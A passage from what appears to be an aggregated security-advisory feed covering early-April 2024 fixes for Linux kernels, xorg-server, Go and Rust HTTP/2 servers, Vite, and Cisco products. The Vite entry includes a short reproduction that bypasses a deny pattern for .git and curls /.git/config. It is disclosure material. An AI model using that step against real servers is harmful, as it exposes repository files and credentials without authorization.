and RHVH over or equal 4.5.2 release (JIRA:RHEL-23063)* unable to access smsc95xx based interface unless you start outgoing traffic. (JIRA:RHEL-25719)* [RHEL8] ] BUG bio-696 (Not tainted): Poison overwritten (JIRA:RHEL-26101)* kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19954)* backport smartpqi: fix disable_managed_interrupts (JIRA:RHEL-26139)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26331)* ceph: always check dir caps asynchronously (JIRA:RHEL-27496)Enhancement(s):* [IBM 8.10 FEAT] Upgrade the qeth driver to latest from upstream, e.g. kernel 6.4 (JIRA:RHEL-25811)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1607
02.04.2024 03:00:00redhat[RHSA-2024:1608] opencryptoki security update (moderate)The opencryptoki packages contain version 2.11 of the PKCS#11 API, implemented for IBM Cryptocards, such as IBM 4764 and 4765 crypto cards. These packages includes support for the IBM 4758 Cryptographic CoProcessor (with the PKCS#11 firmware loaded), the IBM eServer Cryptographic Accelerator (FC 4960 on IBM eServer System p), the IBM Crypto Express2 (FC 0863 or FC 0870 on IBM System z), and the IBM CP Assist for Cryptographic Function (FC 3863 on IBM System z). The opencryptoki packages also bring a software token implementation that can be used without any cryptographic hardware. These packages contain the Slot Daemon (pkcsslotd) and general utilities.Security Fix(es):* opencryptoki: timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) (CVE-2024-0914)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1608
02.04.2024 03:00:00redhat[RHSA-2024:1614] kernel-rt security and bug fix update (important)The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.9.z3 Batch (JIRA:RHEL-23853)* kernel-rt: kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24015)* kernel-rt: kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22758)* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22080)* kernel-rt: kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22933)* kernel-rt: kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24498)* kernel-rt: kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19966)* kernel-rt: kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26334)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1614
02.04.2024 03:00:00vmware[VMSA-2024-0008] VMware SD-WAN Edge and SD-WAN Orchestrator updates address multiple security vulnerabilities. (important)https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0008
02.04.2024 17:40:46android[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
04.04.2024 01:25:44slackware[SSA:2024-094-01] xorg-serverNew xorg-server packages are available for Slackware 15.0 and -current tofix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/xorg-server-1.20.14-i586-12_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Heap buffer overread/data leakage in ProcAppleDRICreatePixmap. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31082 https://www.cve.org/CVERecord?id=CVE-2024-31083 (* Security fix *)patches/packages/xorg-server-xephyr-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xnest-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xvfb-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xwayland-21.1.4-i586-11_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31083 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! 
:-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-11_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-11_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.5-i586-1.txzUpdated package for Slackware x86_64 
-current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.5-x86_64-1.txz**MD5 signatures**Slackware 15.0 package:1f603c1368faa820d0f975f411ae0c41 xorg-server-1.20.14-i586-12_slack15.0.txze59f8ec76a3828ac1d49c435df072f66 xorg-server-xephyr-1.20.14-i586-12_slack15.0.txz0ad3a7c8479c3b61ea0942b94efd27a3 xorg-server-xnest-1.20.14-i586-12_slack15.0.txz212359a07f94f51ee5848eb4825b22ce xorg-server-xvfb-1.20.14-i586-12_slack15.0.txzca7ee08a54569f4f23822084014bf83e xorg-server-xwayland-21.1.4-i586-11_slack15.0.txzSlackware x86_64 15.0 package:e35adc6f3ddd2a626d45464363b62efe xorg-server-1.20.14-x86_64-12_slack15.0.txzd096a062758d94dfd89a553c4c28cf61 xorg-server-xephyr-1.20.14-x86_64-12_slack15.0.txzab02a77825ee590502740921bcef813d xorg-server-xnest-1.20.14-x86_64-12_slack15.0.txz8f258e0b0463e213d88e0d91cf5ac7b1 xorg-server-xvfb-1.20.14-x86_64-12_slack15.0.txz8e89a0d891fc3c61c9a9a62438563dec xorg-server-xwayland-21.1.4-x86_64-11_slack15.0.txzSlackware -current package:d8b62a448a2c21fbf5b2dcc53e6d6f0e x/xorg-server-21.1.12-i586-1.txz7ded182f2c4402184b304bf57a069ebd x/xorg-server-xephyr-21.1.12-i586-1.txz6817075f09d7da8fa97a38251c7ed057 x/xorg-server-xnest-21.1.12-i586-1.txz1ed9e41bbe460a7b64f67e29a7087061 x/xorg-server-xvfb-21.1.12-i586-1.txz1d6e03918c4b9c8e0cd11ee2b016ba6a x/xorg-server-xwayland-23.2.5-i586-1.txzSlackware x86_64 -current package:6a042c5acf3008fe81acdb99b4f18888 x/xorg-server-21.1.12-x86_64-1.txz1b08420cdbb14f976ed8b64864e69c01 
x/xorg-server-xephyr-21.1.12-x86_64-1.txzdf2d61f8872c9506951cf929a4267689 x/xorg-server-xnest-21.1.12-x86_64-1.txz2b5fb68e19b9570fcbdc0cdf2f223ceb x/xorg-server-xvfb-21.1.12-x86_64-1.txzb3603890c6a3db5695711abd59a74add x/xorg-server-xwayland-23.2.5-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg xorg-server-*.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-094-01
03.04.2024 20:40:45go[GO-2024-2687] HTTP/2 CONTINUATION flood in net/httpAn attacker may cause an HTTP/2 endpoint to read arbitrary amounts of headerdata by sending an excessive number of CONTINUATION frames.Maintaining HPACK state requires parsing and processing all HEADERS andCONTINUATION frames on a connection. When a request's headers exceedMaxHeaderBytes, no memory is allocated to store the excess headers, but they arestill parsed.This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amountsof header data, all associated with a request which is going to be rejected.These headers can include Huffman-encoded data which is significantly moreexpensive for the receiver to decode than for an attacker to send.The fix sets a limit on the amount of excess header frames we will processbefore closing a connection.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2687
03.04.2024 23:34:58npm[NPM:GHSA-8JHW-289H-JH2G] Vite's `server.fs.deny` did not deny requests for patterns with directories. (moderate)### Summary[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` did not deny requests for patterns with directories. An example of such a pattern is `/foo/**/*`.### ImpactOnly apps setting a custom `server.fs.deny` that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.### PatchesFixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18### Details`server.fs.deny` uses picomatch with the config of `{ matchBase: true }`. [matchBase](https://github.com/micromatch/picomatch/blob/master/README.md#options:~:text=Description-,basename,-boolean) only matches the basename of the file, not the path due to a bug (https://github.com/micromatch/picomatch/issues/89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set `{ dot: true }` and that causes [dotfiles not to be denied](https://github.com/micromatch/picomatch/blob/master/README.md#options:~:text=error%20is%20thrown.-,dot,-boolean) unless they are explicitly defined.**Reproduction**Set fs.deny to `['**/.git/**']` and then curl for `/.git/config`.* with `matchBase: true`, you can get any file under `.git/` (config, HEAD, etc).* with `matchBase: false`, you cannot get any file under `.git/` (config, HEAD, etc).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8JHW-289H-JH2G
03.04.2024 19:00:00cisco[CISCO-SA-CEM-CSRF-SUCMNJFR] Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities (medium)Multiple vulnerabilities in Cisco Emergency Responder could allow an attacker to conduct a cross-site request forgery (CSRF) or directory traversal attack, which could allow the attacker to perform arbitrary actions on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CEM-CSRF-SUCMNJFR
03.04.2024 19:00:00cisco[CISCO-SA-TMS-XSS-KGW4DX9Y] Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco TelePresence Management Suite (TMS) could allow a low-privileged, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-TMS-XSS-KGW4DX9Y
03.04.2024 19:00:00cisco[CISCO-SA-SBIZ-RV-XSS-OQERTUP] Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SBIZ-RV-XSS-OQERTUP
03.04.2024 19:00:00cisco[CISCO-SA-NDRU-PESC-KZ2PQLZH] Cisco Nexus Dashboard Privilege Escalation Vulnerability (medium)A vulnerability in Cisco Nexus Dashboard could allow an authenticated, local attacker with valid rescue-user credentials to elevate privileges to root on an affected device.This vulnerability is due to insufficient protections for a sensitive access token. An attacker could exploit this vulnerability by using this token to access resources within the device infrastructure. A successful exploit could allow an attacker to gain root access to the filesystem or hosted containers on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDRU-PESC-KZ2PQLZH
03.04.2024 19:00:00cisco[CISCO-SA-NDO-UPAV-YRQSCCSP] Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability (medium)A vulnerability in the tenant security implementation of Cisco Nexus Dashboard Orchestrator (NDO) could allow an authenticated, remote attacker to modify or delete tenant templates on an affected system.This vulnerability is due to improper access controls within tenant security. An attacker who is using a valid user account with write privileges and either a Site Manager or Tenant Manager role could exploit this vulnerability. A successful exploit could allow the attacker to modify or delete tenant templates under non-associated tenants, which could disrupt network traffic.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDO-UPAV-YRQSCCSP
03.04.2024 19:00:00cisco[CISCO-SA-NDIDV-LMXDVAF2] Cisco Nexus Dashboard Information Disclosure Vulnerability (medium)A vulnerability in Cisco Nexus Dashboard could allow an authenticated, remote attacker to learn cluster deployment information on an affected device.This vulnerability is due to improper access controls on a specific API endpoint. An attacker could exploit this vulnerability by sending queries to the API endpoint. A successful exploit could allow an attacker to access metrics and information about devices in the Nexus Dashboard cluster.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDIDV-LMXDVAF2
03.04.2024 19:00:00cisco[CISCO-SA-NDFCCSRF-TEMZEFJ9] Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Nexus Dashboard and Cisco Nexus Dashboard hosted services could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.This vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected system. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. If the affected user has administrative privileges, these actions could include modifying the system configuration and creating new privileged accounts.Note: There are internal security mechanisms in place that limit the scope of this exploit, reducing the Security Impact Rating of this vulnerability.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFCCSRF-TEMZEFJ9
03.04.2024 19:00:00cisco[CISCO-SA-NDFC-DIR-TRAV-SSN3AYDW] Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability (high)A vulnerability in the Out-of-Band (OOB) Plug and Play (PnP) feature of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an unauthenticated, remote attacker to read arbitrary files.This vulnerability is due to an unauthenticated provisioning web server. An attacker could exploit this vulnerability through direct web requests to the provisioning server. A successful exploit could allow the attacker to read sensitive files in the PnP container that could facilitate further attacks on the PnP infrastructure.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-DIR-TRAV-SSN3AYDW
03.04.2024 19:00:00cisco[CISCO-SA-ISE-SSRF-FTSTH5OZ] Cisco Identity Services Engine Server-Side Request Forgery Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device.This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-SSRF-FTSTH5OZ
03.04.2024 19:00:00cisco[CISCO-SA-ISE-CSRF-NFAKXRP5] Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-CSRF-NFAKXRP5
03.04.2024 19:00:00cisco[CISCO-SA-ECE-XSS-CSQXGXFM] Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability (medium)A vulnerability in the web UI of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web UI does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To successfully exploit this vulnerability, an attacker would need valid agent credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ECE-XSS-CSQXGXFM
03.04.2024 19:00:00cisco[CISCO-SA-CUCM-IMPS-XSS-QUWKD9YF] Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based interface of Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against an authenticated user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading an authenticated user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-IMPS-XSS-QUWKD9YF
03.04.2024 06:15:09alpinelinux[ALPINE:CVE-2024-28219] py3-pillow vulnerability (medium)[From CVE-2024-28219] In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-28219
03.04.2024 03:00:00debian[DSA-5653-1] gtkwave (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5653-1
03.04.2024 03:00:00debian[DSA-5654-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5654-1
03.04.2024 03:00:00oraclelinux[ELSA-2024-12266] kernel security update (important)[4.18.0-513.18.1.0.1_9.OL8]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters [Orabug: 36461932] {CVE-2024-1086}[4.18.0-513.18.1_9.OL8]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.3- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34750652]- Drop not needed patchhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12266
03.04.2024 03:00:00oraclelinux[ELSA-2024-1601] curl security and bug fix update (moderate)[7.61.1-33.5]- cap SFTP packet size sent (RHEL-5485)- when keyboard-interactive auth fails, try password (#2229800)- unify the upload/method handling (CVE-2023-28322)- fix cookie injection with none file (CVE-2023-38546)- lowercase the domain names before PSL checks (CVE-2023-46218)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1601
03.04.2024 03:00:00oraclelinux[ELSA-2024-1608] opencryptoki security update (moderate)[3.21.0-10]- timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin)Resolves: RHEL-22791https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1608
03.04.2024 03:00:00oraclelinux[ELSA-2024-1610] less security update (moderate)[530-2]- Fix CVE-2022-48624- Resolves: RHEL-26265https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1610
03.04.2024 03:00:00oraclelinux[ELSA-2024-1615] expat security update (moderate)[2.2.5-11.0.1.1]- lib: Prevent integer overflow in doProlog [CVE-2022-23990][Orabug: 33910314][2.2.5-11.1]- CVE-2023-52425 expat: parsing large tokens can trigger a denial of service- Resolves: RHEL-29321https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1615
03.04.2024 03:00:00oraclelinux[ELSA-2024-1644] grafana-pcp security and bug fix update (important)[5.1.1-2]- Rebuild with latest version of golang- resolves CVE-2024-1394https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1644
03.04.2024 03:00:00oraclelinux[ELSA-2024-1646] grafana security and bug fix update (important)[9.2.10-8]- Rebuild with latest version of golang- resolves CVE-2024-1394https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1646
03.04.2024 03:00:00oraclelinux[ELSA-2024-12265] kernel security update (important)- [5.14.0-362.24.1.0.1_3.OL9]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters [Orabug: 36461940 ] {CVE-2024-1086}- [5.14.0-362.24.1_3.OL9]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5- Remove nmap references from kernel (Mridula Shastry) [Orabug: 34313944]- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Disable unified kernel image package build- Add Oracle Linux IMA certificateshttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12265
03.04.2024 21:23:14rustsec[RUSTSEC-2024-0332] Degradation of service in h2 servers with CONTINUATION FloodAn attacker can send a flood of CONTINUATION frames, causing `h2` to process them indefinitely. This results in an increase in CPU usage. Tokio task budget helps prevent this from a complete denial-of-service, as the server can still respond to legitimate requests, albeit with increased latency. More details at https://seanmonstar.com/blog/hyper-http2-continuation-flood/. Patches available for 0.4.x and 0.3.x versions.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0332
03.04.2024 23:26:37maven[MAVEN:GHSA-7MG2-6C6V-342R] Apache Pulsar: Improper Authorization For Namespace and Topic Management Endpoints (moderate)This vulnerability allows authenticated users with produce or consume permissions to perform unauthorized operations on partitioned topics, such as unloading topics and triggering compaction. These management operations should be restricted to users with the tenant admin role or superuser role. An authenticated user with produce permission can create subscriptions and update subscription properties on partitioned topics, even though this should be limited to users with consume permissions. This impact analysis assumes that Pulsar has been configured with the default authorization provider. For custom authorization providers, the impact could be slightly different. Additionally, the vulnerability allows an authenticated user to read, create, modify, and delete namespace properties in any namespace in any tenant. In Pulsar, namespace properties are reserved for user provided metadata about the namespace. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.6, from 2.11.0 to 2.11.4, from 3.0.0 to 3.0.3, from 3.1.0 to 3.1.3, and from 3.2.0 to 3.2.1. 3.0 Apache Pulsar users should upgrade to at least 3.0.4. 3.1 and 3.2 Apache Pulsar users should upgrade to at least 3.2.2. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MG2-6C6V-342R
02.04.2024 23:07:38go[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)The Casa OS Login page has a username enumeration vulnerability in the login page that was patched in Casa OS v0.4.7. The issue exists because the application response differs depending on whether the username or password is incorrect, allowing an attacker to enumerate usernames by observing the application response. For example, if the username is incorrect, the application returns "User does not exist" with return code "10006", while if the password is incorrect, it returns "User does not exist or password is invalid" with return code "10013". This allows an attacker to determine if a username exists without knowing the password.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
03.04.2024 01:26:38almalinux[ALSA-2024:1610] less security update (moderate)less security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1610
03.04.2024 11:51:24almalinux[ALSA-2024:1615] expat security update (moderate)expat security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1615
03.04.2024 01:28:33almalinux[ALSA-2024:1601] curl security and bug fix update (moderate)curl security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1601
03.04.2024 21:46:18almalinux[ALSA-2024:1608] opencryptoki security update (moderate)opencryptoki security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1608
03.04.2024 17:02:46almalinux[ALSA-2024:1644] grafana-pcp security and bug fix update (important)grafana-pcp security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1644
03.04.2024 18:14:05almalinux[ALSA-2024:1646] grafana security and bug fix update (important)grafana security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1646
03.04.2024 17:53:00maven[MAVEN:GHSA-R65J-6H5F-4F92] Withdrawn: JJWT improperly generates signing keys (moderate)Withdrawn Advisory: This advisory has been withdrawn because it has been found to be disputed. Please see the issue [here](https://github.com/jwtk/jjwt/issues/930#issuecomment-2032699358) for more information. Original Description: JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R65J-6H5F-4F92
03.04.2024 17:40:51android[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
03.04.2024 17:52:34almalinux[ALSA-2024:1484] firefox security update (critical)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1484
03.04.2024 17:53:57almalinux[ALSA-2024:1485] firefox security update (critical)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1485
04.04.2024 23:15:08alpinelinux[ALPINE:CVE-2023-38709] apache2 vulnerability[From CVE-2023-38709] Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses. This issue affects Apache HTTP Server: through 2.4.58.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38709
